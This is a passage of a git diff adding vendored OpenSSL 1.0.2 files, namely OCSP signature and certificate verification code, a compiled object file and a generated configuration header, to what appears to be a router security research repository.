+int OCSP_basic_verify(OCSP_BASICRESP *bs, STACK_OF(X509) *certs,
+                      X509_STORE *st, unsigned long flags)
+{
+    X509 *signer, *x;
+    STACK_OF(X509) *chain = NULL;
+    X509_STORE_CTX ctx;
+    int i, ret = 0;
+    ret = ocsp_find_signer(&signer, bs, certs, st, flags);
+    if (!ret) {
+        OCSPerr(OCSP_F_OCSP_BASIC_VERIFY,
+                OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND);
+        goto end;
+    }
+    if ((ret == 2) && (flags & OCSP_TRUSTOTHER))
+        flags |= OCSP_NOVERIFY;
+    if (!(flags & OCSP_NOSIGS)) {
+        EVP_PKEY *skey;
+        skey = X509_get_pubkey(signer);
+        if (skey) {
+            ret = OCSP_BASICRESP_verify(bs, skey, 0);
+            EVP_PKEY_free(skey);
+        }
+        if (!skey || ret <= 0) {
+            OCSPerr(OCSP_F_OCSP_BASIC_VERIFY, OCSP_R_SIGNATURE_FAILURE);
+            goto end;
+        }
+    }
+    if (!(flags & OCSP_NOVERIFY)) {
+        int init_res;
+        if (flags & OCSP_NOCHAIN)
+            init_res = X509_STORE_CTX_init(&ctx, st, signer, NULL);
+        else
+            init_res = X509_STORE_CTX_init(&ctx, st, signer, bs->certs);
+        if (!init_res) {
+            ret = -1;
+            OCSPerr(OCSP_F_OCSP_BASIC_VERIFY, ERR_R_X509_LIB);
+            goto end;
+        }
+
+        X509_STORE_CTX_set_purpose(&ctx, X509_PURPOSE_OCSP_HELPER);
+        ret = X509_verify_cert(&ctx);
+        chain = X509_STORE_CTX_get1_chain(&ctx);
+        X509_STORE_CTX_cleanup(&ctx);
+        if (ret <= 0) {
+            i = X509_STORE_CTX_get_error(&ctx);
+            OCSPerr(OCSP_F_OCSP_BASIC_VERIFY,
+                    OCSP_R_CERTIFICATE_VERIFY_ERROR);
+            ERR_add_error_data(2, "Verify error:",
+                               X509_verify_cert_error_string(i));
+            goto end;
+        }
+        if (flags & OCSP_NOCHECKS) {
+            ret = 1;
+            goto end;
+        }
+        /*
+         * At this point we have a valid certificate chain need to verify it
+         * against the OCSP issuer criteria.
+         */
+        ret = ocsp_check_issuer(bs, chain, flags);
+
+        /* If fatal error or valid match then finish */
+        if (ret != 0)
+            goto end;
+
+        /*
+         * Easy case: explicitly trusted. Get root CA and check for explicit
+         * trust
+         */
+        if (flags & OCSP_NOEXPLICIT)
+            goto end;
+
+        x = sk_X509_value(chain, sk_X509_num(chain) - 1);
+        if (X509_check_trust(x, NID_OCSP_sign, 0) != X509_TRUST_TRUSTED) {
+            OCSPerr(OCSP_F_OCSP_BASIC_VERIFY, OCSP_R_ROOT_CA_NOT_TRUSTED);
+            goto end;
+        }
+        ret = 1;
+    }
+
+ end:
+    if (chain)
+        sk_X509_pop_free(chain, X509_free);
+    return ret;
+}
+
+static int ocsp_find_signer(X509 **psigner, OCSP_BASICRESP *bs,
+                            STACK_OF(X509) *certs, X509_STORE *st,
+                            unsigned long flags)
+{
+    X509 *signer;
+    OCSP_RESPID *rid = bs->tbsResponseData->responderId;
+    if ((signer = ocsp_find_signer_sk(certs, rid))) {
+        *psigner = signer;
+        return 2;
+    }
+    if (!(flags & OCSP_NOINTERN) &&
+        (signer = ocsp_find_signer_sk(bs->certs, rid))) {
+        *psigner = signer;
+        return 1;
+    }
+    /* Maybe lookup from store if by subject name */
+
+    *psigner = NULL;
+    return 0;
+}
+
+static X509 *ocsp_find_signer_sk(STACK_OF(X509) *certs, OCSP_RESPID *id)
+{
+    int i;
+    unsigned char tmphash[SHA_DIGEST_LENGTH], *keyhash;
+    X509 *x;
+
+    /* Easy if lookup by name */
+    if (id->type == V_OCSP_RESPID_NAME)
+        return X509_find_by_subject(certs, id->value.byName);
+
+    /* Lookup by key hash */
+
+    /* If key hash isn't SHA1 length then forget it */
+    if (id->value.byKey->length != SHA_DIGEST_LENGTH)
+        return NULL;
+    keyhash = id->value.byKey->data;
+    /* Calculate hash of each key and compare */
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        x = sk_X509_value(certs, i);
+        X509_pubkey_digest(x, EVP_sha1(), tmphash, NULL);
+        if (!memcmp(keyhash, tmphash, SHA_DIGEST_LENGTH))
+            return x;
+    }
+    return NULL;
+}
+
+static int ocsp_check_issuer(OCSP_BASICRESP *bs, STACK_OF(X509) *chain,
+                             unsigned long flags)
+{
+    STACK_OF(OCSP_SINGLERESP) *sresp;
+    X509 *signer, *sca;
+    OCSP_CERTID *caid = NULL;
+    int i;
+    sresp = bs->tbsResponseData->responses;
+
+    if (sk_X509_num(chain) <= 0) {
+        OCSPerr(OCSP_F_OCSP_CHECK_ISSUER, OCSP_R_NO_CERTIFICATES_IN_CHAIN);
+        return -1;
+    }
+
+    /* See if the issuer IDs match. */
+    i = ocsp_check_ids(sresp, &caid);
+
+    /* If ID mismatch or other error then return */
+    if (i <= 0)
+        return i;
+
+    signer = sk_X509_value(chain, 0);
+    /* Check to see if OCSP responder CA matches request CA */
+    if (sk_X509_num(chain) > 1) {
+        sca = sk_X509_value(chain, 1);
+        i = ocsp_match_issuerid(sca, caid, sresp);
+        if (i < 0)
+            return i;
+        if (i) {
+            /* We have a match, if extensions OK then success */
+            if (ocsp_check_delegated(signer, flags))
+                return 1;
+            return 0;
+        }
+    }
+
+    /* Otherwise check if OCSP request signed directly by request CA */
+    return ocsp_match_issuerid(signer, caid, sresp);
+}
+
+/*
+ * Check the issuer certificate IDs for equality. If there is a mismatch with
+ * the same algorithm then there's no point trying to match any certificates
+ * against the issuer. If the issuer IDs all match then we just need to check
+ * equality against one of them.
+ */
+
+static int ocsp_check_ids(STACK_OF(OCSP_SINGLERESP) *sresp, OCSP_CERTID **ret)
+{
+    OCSP_CERTID *tmpid, *cid;
+    int i, idcount;
+
+    idcount = sk_OCSP_SINGLERESP_num(sresp);
+    if (idcount <= 0) {
+        OCSPerr(OCSP_F_OCSP_CHECK_IDS,
+                OCSP_R_RESPONSE_CONTAINS_NO_REVOCATION_DATA);
+        return -1;
+    }
+
+    cid = sk_OCSP_SINGLERESP_value(sresp, 0)->certId;
+
+    *ret = NULL;
+
+    for (i = 1; i < idcount; i++) {
+        tmpid = sk_OCSP_SINGLERESP_value(sresp, i)->certId;
+        /* Check to see if IDs match */
+        if (OCSP_id_issuer_cmp(cid, tmpid)) {
+            /* If algoritm mismatch let caller deal with it */
+            if (OBJ_cmp(tmpid->hashAlgorithm->algorithm,
+                        cid->hashAlgorithm->algorithm))
+                return 2;
+            /* Else mismatch */
+            return 0;
+        }
+    }
+
+    /* All IDs match: only need to check one ID */
+    *ret = cid;
+    return 1;
+}
+
+static int ocsp_match_issuerid(X509 *cert, OCSP_CERTID *cid,
+                               STACK_OF(OCSP_SINGLERESP) *sresp)
+{
+    /* If only one ID to match then do it */
+    if (cid) {
+        const EVP_MD *dgst;
+        X509_NAME *iname;
+        int mdlen;
+        unsigned char md[EVP_MAX_MD_SIZE];
+        if (!(dgst = EVP_get_digestbyobj(cid->hashAlgorithm->algorithm))) {
+            OCSPerr(OCSP_F_OCSP_MATCH_ISSUERID,
+                    OCSP_R_UNKNOWN_MESSAGE_DIGEST);
+            return -1;
+        }
+
+        mdlen = EVP_MD_size(dgst);
+        if (mdlen < 0)
+            return -1;
+        if ((cid->issuerNameHash->length != mdlen) ||
+            (cid->issuerKeyHash->length != mdlen))
+            return 0;
+        iname = X509_get_subject_name(cert);
+        if (!X509_NAME_digest(iname, dgst, md, NULL))
+            return -1;
+        if (memcmp(md, cid->issuerNameHash->data, mdlen))
+            return 0;
+        X509_pubkey_digest(cert, dgst, md, NULL);
+        if (memcmp(md, cid->issuerKeyHash->data, mdlen))
+            return 0;
+
+        return 1;
+
+    } else {
+        /* We have to match the whole lot */
+        int i, ret;
+        OCSP_CERTID *tmpid;
+        for (i = 0; i < sk_OCSP_SINGLERESP_num(sresp); i++) {
+            tmpid = sk_OCSP_SINGLERESP_value(sresp, i)->certId;
+            ret = ocsp_match_issuerid(cert, tmpid, NULL);
+            if (ret <= 0)
+                return ret;
+        }
+        return 1;
+    }
+
+}
+
+static int ocsp_check_delegated(X509 *x, int flags)
+{
+    X509_check_purpose(x, -1, 0);
+    if ((x->ex_flags & EXFLAG_XKUSAGE) && (x->ex_xkusage & XKU_OCSP_SIGN))
+        return 1;
+    OCSPerr(OCSP_F_OCSP_CHECK_DELEGATED, OCSP_R_MISSING_OCSPSIGNING_USAGE);
+    return 0;
+}
+
+/*
+ * Verify an OCSP request. This is fortunately much easier than OCSP response
+ * verify. Just find the signers certificate and verify it against a given
+ * trust value.
+ */
+
+int OCSP_request_verify(OCSP_REQUEST *req, STACK_OF(X509) *certs,
+                        X509_STORE *store, unsigned long flags)
+{
+    X509 *signer;
+    X509_NAME *nm;
+    GENERAL_NAME *gen;
+    int ret;
+    X509_STORE_CTX ctx;
+    if (!req->optionalSignature) {
+        OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY, OCSP_R_REQUEST_NOT_SIGNED);
+        return 0;
+    }
+    gen = req->tbsRequest->requestorName;
+    if (!gen || gen->type != GEN_DIRNAME) {
+        OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY,
+                OCSP_R_UNSUPPORTED_REQUESTORNAME_TYPE);
+        return 0;
+    }
+    nm = gen->d.directoryName;
+    ret = ocsp_req_find_signer(&signer, req, nm, certs, store, flags);
+    if (ret <= 0) {
+        OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY,
+                OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND);
+        return 0;
+    }
+    if ((ret == 2) && (flags & OCSP_TRUSTOTHER))
+        flags |= OCSP_NOVERIFY;
+    if (!(flags & OCSP_NOSIGS)) {
+        EVP_PKEY *skey;
+        skey = X509_get_pubkey(signer);
+        ret = OCSP_REQUEST_verify(req, skey);
+        EVP_PKEY_free(skey);
+        if (ret <= 0) {
+            OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY, OCSP_R_SIGNATURE_FAILURE);
+            return 0;
+        }
+    }
+    if (!(flags & OCSP_NOVERIFY)) {
+        int init_res;
+        if (flags & OCSP_NOCHAIN)
+            init_res = X509_STORE_CTX_init(&ctx, store, signer, NULL);
+        else
+            init_res = X509_STORE_CTX_init(&ctx, store, signer,
+                                           req->optionalSignature->certs);
+        if (!init_res) {
+            OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY, ERR_R_X509_LIB);
+            return 0;
+        }
+
+        X509_STORE_CTX_set_purpose(&ctx, X509_PURPOSE_OCSP_HELPER);
+        X509_STORE_CTX_set_trust(&ctx, X509_TRUST_OCSP_REQUEST);
+        ret = X509_verify_cert(&ctx);
+        X509_STORE_CTX_cleanup(&ctx);
+        if (ret <= 0) {
+            ret = X509_STORE_CTX_get_error(&ctx);
+            OCSPerr(OCSP_F_OCSP_REQUEST_VERIFY,
+                    OCSP_R_CERTIFICATE_VERIFY_ERROR);
+            ERR_add_error_data(2, "Verify error:",
+                               X509_verify_cert_error_string(ret));
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static int ocsp_req_find_signer(X509 **psigner, OCSP_REQUEST *req,
+                                X509_NAME *nm, STACK_OF(X509) *certs,
+                                X509_STORE *st, unsigned long flags)
+{
+    X509 *signer;
+    if (!(flags & OCSP_NOINTERN)) {
+        signer = X509_find_by_subject(req->optionalSignature->certs, nm);
+        if (signer) {
+            *psigner = signer;
+            return 1;
+        }
+    }
+
+    signer = X509_find_by_subject(certs, nm);
+    if (signer) {
+        *psigner = signer;
+        return 2;
+    }
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.o
new file mode 100644
index 0000000000000000000000000000000000000000..7430a33e85a3269a7e0cb0cf03b28952f93df9b6
GIT binary patch
literal 7272
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
QR?;694nBa!NGsR>4+cZcEC2ui

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h
new file mode 100644
index 0000000..467e03c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h
@@ -0,0 +1,334 @@
+/* opensslconf.h */
+/* WARNING: Generated automatically from opensslconf.h.in by Configure. */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+/* OpenSSL was configured with the following options: */
+#ifndef OPENSSL_DOING_MAKEDEPEND
+
+
+#ifndef OPENSSL_NO_COMP
+# define OPENSSL_NO_COMP
+#endif
+#ifndef OPENSSL_NO_DTLS1
+# define OPENSSL_NO_DTLS1
+#endif
+#ifndef OPENSSL_NO_EC
+# define OPENSSL_NO_EC
+#endif
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+# define OPENSSL_NO_EC_NISTP_64_GCC_128
+#endif
+#ifndef OPENSSL_NO_ECDH
+# define OPENSSL_NO_ECDH
+#endif
+#ifndef OPENSSL_NO_ECDSA
+# define OPENSSL_NO_ECDSA
+#endif
+#ifndef OPENSSL_NO_ENGINE
+# define OPENSSL_NO_ENGINE
+#endif
+#ifndef OPENSSL_NO_GMP
+# define OPENSSL_NO_GMP
+#endif
+#ifndef OPENSSL_NO_GOST
+# define OPENSSL_NO_GOST
+#endif
+#ifndef OPENSSL_NO_IDEA
+# define OPENSSL_NO_IDEA
+#endif
+#ifndef OPENSSL_NO_JPAKE
+# define OPENSSL_NO_JPAKE
+#endif
+#ifndef OPENSSL_NO_KRB5
+# define OPENSSL_NO_KRB5
+#endif
+#ifndef OPENSSL_NO_LIBUNBOUND
+# define OPENSSL_NO_LIBUNBOUND
+#endif
+#ifndef OPENSSL_NO_MD2
+# define OPENSSL_NO_MD2
+#endif
+#ifndef OPENSSL_NO_PSK
+# define OPENSSL_NO_PSK
+#endif
+#ifndef OPENSSL_NO_RC5
+# define OPENSSL_NO_RC5
+#endif
+#ifndef OPENSSL_NO_RFC3779
+# define OPENSSL_NO_RFC3779
+#endif
+#ifndef OPENSSL_NO_SCTP
+# define OPENSSL_NO_SCTP
+#endif
+#ifndef OPENSSL_NO_SRP
+# define OPENSSL_NO_SRP
+#endif
+#ifndef OPENSSL_NO_SSL_TRACE
+# define OPENSSL_NO_SSL_TRACE
+#endif
+#ifndef OPENSSL_NO_SSL2
+# define OPENSSL_NO_SSL2
+#endif
+#ifndef OPENSSL_NO_SSL3
+# define OPENSSL_NO_SSL3
+#endif
+#ifndef OPENSSL_NO_STORE
+# define OPENSSL_NO_STORE
+#endif
+#ifndef OPENSSL_NO_UNIT_TEST
+# define OPENSSL_NO_UNIT_TEST
+#endif
+
+#endif /* OPENSSL_DOING_MAKEDEPEND */
+
+#ifndef OPENSSL_NO_ASM
+# define OPENSSL_NO_ASM
+#endif
+#ifndef OPENSSL_NO_ERR
+# define OPENSSL_NO_ERR
+#endif
+#ifndef OPENSSL_NO_HW
+# define OPENSSL_NO_HW
+#endif
+#ifndef OPENSSL_NO_DYNAMIC_ENGINE
+# define OPENSSL_NO_DYNAMIC_ENGINE
+#endif
+
+/* The OPENSSL_NO_* macros are also defined as NO_* if the application
+   asks for it.  This is a transient feature that is provided for those
+   who haven't had the time to do the appropriate changes in their
+   applications.  */
+#ifdef OPENSSL_ALGORITHM_DEFINES
+# if defined(OPENSSL_NO_COMP) && !defined(NO_COMP)
+#  define NO_COMP
+# endif
+# if defined(OPENSSL_NO_DTLS1) && !defined(NO_DTLS1)
+#  define NO_DTLS1
+# endif
+# if defined(OPENSSL_NO_EC) && !defined(NO_EC)
+#  define NO_EC
+# endif
+# if defined(OPENSSL_NO_EC_NISTP_64_GCC_128) && !defined(NO_EC_NISTP_64_GCC_128)
+#  define NO_EC_NISTP_64_GCC_128
+# endif
+# if defined(OPENSSL_NO_ECDH) && !defined(NO_ECDH)
+#  define NO_ECDH
+# endif
+# if defined(OPENSSL_NO_ECDSA) && !defined(NO_ECDSA)
+#  define NO_ECDSA
+# endif
+# if defined(OPENSSL_NO_ENGINE) && !defined(NO_ENGINE)
+#  define NO_ENGINE
+# endif
+# if defined(OPENSSL_NO_GMP) && !defined(NO_GMP)
+#  define NO_GMP
+# endif
+# if defined(OPENSSL_NO_GOST) && !defined(NO_GOST)
+#  define NO_GOST
+# endif
+# if defined(OPENSSL_NO_IDEA) && !defined(NO_IDEA)
+#  define NO_IDEA
+# endif
+# if defined(OPENSSL_NO_JPAKE) && !defined(NO_JPAKE)
+#  define NO_JPAKE
+# endif
+# if defined(OPENSSL_NO_KRB5) && !defined(NO_KRB5)
+#  define NO_KRB5
+# endif
+# if defined(OPENSSL_NO_LIBUNBOUND) && !defined(NO_LIBUNBOUND)
+#  define NO_LIBUNBOUND
+# endif
+# if defined(OPENSSL_NO_MD2) && !defined(NO_MD2)
+#  define NO_MD2
+# endif
+# if defined(OPENSSL_NO_PSK) && !defined(NO_PSK)
+#  define NO_PSK
+# endif
+# if defined(OPENSSL_NO_RC5) && !defined(NO_RC5)
+#  define NO_RC5
+# endif
+# if defined(OPENSSL_NO_RFC3779) && !defined(NO_RFC3779)
+#  define NO_RFC3779
+# endif
+# if defined(OPENSSL_NO_SCTP) && !defined(NO_SCTP)
+#  define NO_SCTP
+# endif
+# if defined(OPENSSL_NO_SRP) && !defined(NO_SRP)
+#  define NO_SRP
+# endif
+# if defined(OPENSSL_NO_SSL_TRACE) && !defined(NO_SSL_TRACE)
+#  define NO_SSL_TRACE
+# endif
+# if defined(OPENSSL_NO_SSL2) && !defined(NO_SSL2)
+#  define NO_SSL2
+# endif
+# if defined(OPENSSL_NO_SSL3) && !defined(NO_SSL3)
+#  define NO_SSL3
+# endif
+# if defined(OPENSSL_NO_STORE) && !defined(NO_STORE)
+#  define NO_STORE
+# endif
+# if defined(OPENSSL_NO_UNIT_TEST) && !defined(NO_UNIT_TEST)
+#  define NO_UNIT_TEST
+# endif
+#endif
+
+/* crypto/opensslconf.h.in */
+
+/* Generate 80386 code? */
+#undef I386_ONLY
+
+#if !(defined(VMS) || defined(__VMS)) /* VMS uses logical names instead */
+#if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
+#define ENGINESDIR "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt/lib/engines"
+#define OPENSSLDIR "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt"
+#endif
+#endif
+
+#undef OPENSSL_UNISTD
+#define OPENSSL_UNISTD <unistd.h>
+
+#undef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
+#define IDEA_INT unsigned int
+#endif
+
+#if defined(HEADER_MD2_H) && !defined(MD2_INT)
+#define MD2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC2_H) && !defined(RC2_INT)
+/* I need to put in a mod for the alpha - eay */
+#define RC2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC4_H)
+#if !defined(RC4_INT)
+/* using int types make the structure larger but make the code faster
+ * on most boxes I have tested - up to %20 faster. */
+/*
+ * I don't know what does "most" mean, but declaring "int" is a must on:
+ * - Intel P6 because partial register stalls are very expensive;
+ * - elder Alpha because it lacks byte load/store instructions;
+ */
+#define RC4_INT unsigned int
+#endif
+#if !defined(RC4_CHUNK)
+/*
+ * This enables code handling data aligned at natural CPU word
+ * boundary. See crypto/rc4/rc4_enc.c for further details.
+ */
+#define RC4_CHUNK unsigned long
+#endif
+#endif
+
+#if (defined(HEADER_NEW_DES_H) || defined(HEADER_DES_H)) && !defined(DES_LONG)
+/* If this is set to 'unsigned int' on a DEC Alpha, this gives about a
+ * %20 speed up (longs are 8 bytes, int's are 4). */
+#ifndef DES_LONG
+#define DES_LONG unsigned int
+#endif
+#endif
+
+#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
+#define CONFIG_HEADER_BN_H
+#undef BN_LLONG
+
+/* Should we define BN_DIV2W here? */
+
+/* Only one for the following should be defined */
+#define SIXTY_FOUR_BIT_LONG
+#undef SIXTY_FOUR_BIT
+#undef THIRTY_TWO_BIT
+#endif
+
+#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
+#define CONFIG_HEADER_RC4_LOCL_H
+/* if this is defined data[i] is used instead of *data, this is a %20
+ * speedup on x86 */
+#undef RC4_INDEX
+#endif
+
+#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
+#define CONFIG_HEADER_BF_LOCL_H
+#undef BF_PTR
+#endif /* HEADER_BF_LOCL_H */
+
+#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
+#define CONFIG_HEADER_DES_LOCL_H
+#ifndef DES_DEFAULT_OPTIONS
+/* the following is tweaked from a config script, that is why it is a
+ * protected undef/define */
+#ifndef DES_PTR
+#undef DES_PTR
+#endif
+
+/* This helps C compiler generate the correct code for multiple functional
+ * units.  It reduces register dependancies at the expense of 2 more
+ * registers */
+#ifndef DES_RISC1
+#undef DES_RISC1
+#endif
+
+#ifndef DES_RISC2
+#undef DES_RISC2
+#endif
+
+#if defined(DES_RISC1) && defined(DES_RISC2)
+YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED!!!!!
+#endif
+
+/* Unroll the inner loop, this sometimes helps, sometimes hinders.
+ * Very mucy CPU dependant */
+#ifndef DES_UNROLL
+#define DES_UNROLL
+#endif
+
+/* These default values were supplied by
+ * Peter Gutman <pgut001@cs.auckland.ac.nz>
+ * They are only used if nothing else has been defined */
+#if !defined(DES_PTR) && !defined(DES_RISC1) && !defined(DES_RISC2) && !defined(DES_UNROLL)
+/* Special defines which change the way the code is built depending on the
+   CPU and OS.  For SGI machines you can use _MIPS_SZLONG (32 or 64) to find
+   even newer MIPS CPU's, but at the moment one size fits all for
+   optimization options.  Older Sparc's work better with only UNROLL, but
+   there's no way to tell at compile time what it is you're running on */
+ 
+#if defined( sun )		/* Newer Sparc's */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#elif defined( __ultrix )	/* Older MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined( __osf1__ )	/* Alpha */
+#  define DES_PTR
+#  define DES_RISC2
+#elif defined ( _AIX )		/* RS6000 */
+  /* Unknown */
+#elif defined( __hpux )		/* HP-PA */
+  /* Unknown */
+#elif defined( __aux )		/* 68K */
+  /* Unknown */
